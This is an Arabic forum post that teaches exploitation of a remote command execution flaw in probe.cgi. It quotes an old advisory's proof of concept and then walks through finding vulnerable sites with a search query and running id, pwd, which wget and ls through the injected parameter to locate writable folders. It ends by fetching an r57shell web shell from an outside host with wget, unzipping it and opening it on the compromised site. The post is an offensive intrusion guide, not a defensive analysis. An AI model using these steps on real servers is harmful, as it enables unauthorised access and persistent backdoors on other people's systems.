Star Media

مرحبا بك عزيزي الزائر. بعض الأقسام و الروابط لا تضهر للزوار المرجوا منك أن تعرّف بنفسك و . إن لم يكن لديك حساب بعد, نتشرف بدعوتك لإنشائه و تصبح أحد أعضاء عائلتنا المتواضعة
<script type="text/javascript"><!--
document.write('<s'+'cript type="text/javascript" src="http://www.adallnetwork.com/sh.php?z=28&pl=1581&j=1&code='+new Date().getTime()+'"></s'+'cript>');
// --></script>
<noscript>
<iframe src="http://www.adallnetwork.com/sh.php?z=28&pl=1581" width="728" height="90" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>
</noscript>
<script type="text/javascript"><!--
zone = "38";
pl = "4150";
url = "http://www.adallnetwork.com";
//--></script>
<script type="text/javascript" src="http://www.adallnetwork.com/s.js"></script>

أقوى موقع يوفر البرامج النادرة


    فن التعامل مع ثغرات Remote command exucetion

    شاطر
    avatar
    MOTASEM
    عضو بفريق عمل الموقع
    عضو بفريق عمل الموقع

    ذكر
    عدد الرسائل : 57
    العمر : 28
    الجنسية : فلسطيني
    السٌّمعَة : 1
    نقاط : 3430
    تاريخ التسجيل : 08/07/2008

    فن التعامل مع ثغرات Remote command exucetion

    مُساهمة من طرف MOTASEM في الأحد 18 يناير - 19:53

    السلام عليكم ورحمة الله

    راح نشرح عمل نوع من الثغرات وهي ما تسمى

    (( Remote command exucetion ))

    وهي تسمح لك برفع شل او باكدور ,,,,,,الخ

    اول حاجه لازم يكون عندك شل مرفوع بموقعك او احد المواقع,,,

    طيب خلينا نجيب ثغره ونطبق عنونها كذا

    Probe.cgi Remote Command Execution

    يعني بملف Probe.cgi فيه ثغره رموت كومند حلو ...طيب خلونا نشوف الاكسبلويت


    كود PHP:




    Authors ....... spher3 (spher3 at fatalimpulse dot net)

    Date .......... 04-07-2005

    Product
    ....... probe.cgi

    Type
    .......... Remote Command Execution


    o Info
    :

    ================

    That script is used to open file '.dat'.


    o Vulnerable Code:

    ================

    ..

    23 [...]

    24 $old = $query->param('olddat');

    25 [...]

    ..

    ..

    34 [...]

    35 open (VF, "$olddat");

    36 [...]

    ..


    (
    24) At this line, the cgi param 'olddat' is associated to one database.

    This variable isnt checked by anyone matching, so you can open

    all file that you want
    . (35) At this line the script open the file

    that you had chosen
    . With pipe `|`

    is possible to execute arbitrary code on the shell.



    o Proof of concept:

    ================


    http://the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id|

    uid=99(www) gid=99(www)








    لو تقراء باعلى موضح لك الملف ونوع الثغره,,,,,طيب احنا عوزين الاستثمار

    استثمارها هنا بالسطر


    كود:

    http://the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id|

    the-vuln.site.org.<<===الموقع المستهدف وهو افتراضي

    cgi-bin<<===مجلد السيقيبين

    probe.cgi<<===الملف المصاب

    olddat<<===مكان الاصابه داخل الملف ومو شرط نفس الاسم ممكن يتغير
    ===============

    طيب نبغى نعرف كيف عملها اوكي

    اول تسوي بحث بالطريقه هذي

    allinurlrobe.cgi

    او اي طريقة تحب

    لنفرض اننا حصل موقع

    WWW.???.com/cgi.bin/probe.cgi?grid=ThaiGrid

    كويس اول حاجه نضع


    كود:

    |id|

    بيطلع بالشكل


    كود:

    WWW.???.com/cgi.bin/probe.cgi?grid=|id|

    واعطيه انتر بيظهر لك مثلا كذا


    كود:

    uid=99(www) gid=99(www)

    هذا صفتك بالسيرفر

    طيب نبغى ننعرفع ممكاننا وين ضع مكان الاي دي


    كود:

    pwd


    كود:

    WWW.???.com/cgi.bin/probe.cgi?grid=|pwd|

    بيطلع معك مثلا


    كود:

    /home/.???/cgi.bin

    طيب نبغى نشوف مسموح لينا نرفع ملف والا لا؟

    ضع مكان الاي دي


    كود:

    which wget

    بالشكل,,,,,,,,,


    كود:

    WWW.???.com/cgi.bin/probe.cgi?grid=|which wget|

    اذا ضهر لك كدا


    كود:

    /؟؟؟/؟؟؟/wget

    وعلامة الاستفاهم متغير يعني اهم شي ويقت تظهر فاعرف انك الوضع زي الفل

    يعني مسموح لك ترفع ملف انبسط ياعم

    طيب نبغى نعرف التصاريح للمجلدات والملفات عشان نشوف وين المسوح لينا بالرفع

    لو ترجع احنا قلنا مكاننا وين هنا


    كود:

    /home/.???/cgi.bin

    طيب احنا نبغى نخرج من مجلد cgi.bin للديكويتري الرئيسي حلو

    نضع مكان الاي دي

    كود:

    cd /home/.???/;pwd

    يعني بيكون بالشكل


    كود:

    WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/;pwd|

    الان بيرجعنا الى


    كود:

    home/.???/

    حلو الان نبغى نشوف المجلدات والمفات و التصريحات بالامر


    كود:

    ;ls%20-al

    بيطلع كذا,,,,,


    كود:

    WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/;ls%20-al|

    بتظهر لك ملفات ومجلدات الموقع واما مهم تصريحاتهم

    انت ابحث عن الملجلد اللي له التصريح


    كود:

    drwxrwxrwx

    لنفرض انك حصلت امام مجلد الصور او uploads

    اولا لازم نخش عليه تعمل


    كود:

    home/.???/uploads/;pwd


    كود:

    WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/;pwd|

    حلو بيكون وضعك بالشكل


    كود:

    home/.???/uploads/

    يعني داخل مجلد uploads

    الان كل معليك رفع الشل طبعا لك شل مرفوع باحد المواقع يعني رابط شيلك


    كود:

    www.XXX.com/r57shell.zip

    وتبغى ترفعه على الموقع المخترقه بالشكل,,,,


    كود:

    WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/wget www.XXX.com/r57shell.zip*|

    واعطيه انتر بيظهر لك


    كود:

    r57shell.zip

    طيب نبغى نفك الضغط عنه بالامر unzip


    كود:

    WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/unzip r57shell.zip*|

    وديلو انتر بيطلع معك


    كود:

    r57shell.php

    والف مبروك خش وافتحه بالمتصفح وتمتع وبيكون الرابط

    WWW.???.com/uploads/r57shell.php

    عموما ياجماعه الموضع كله انك تعرف كيف تتحرك وترفع ,,, وراح تكون الثغرات اسهل منها ما فيه

    والى اللقاء

      الوقت/التاريخ الآن هو الخميس 23 نوفمبر - 14:16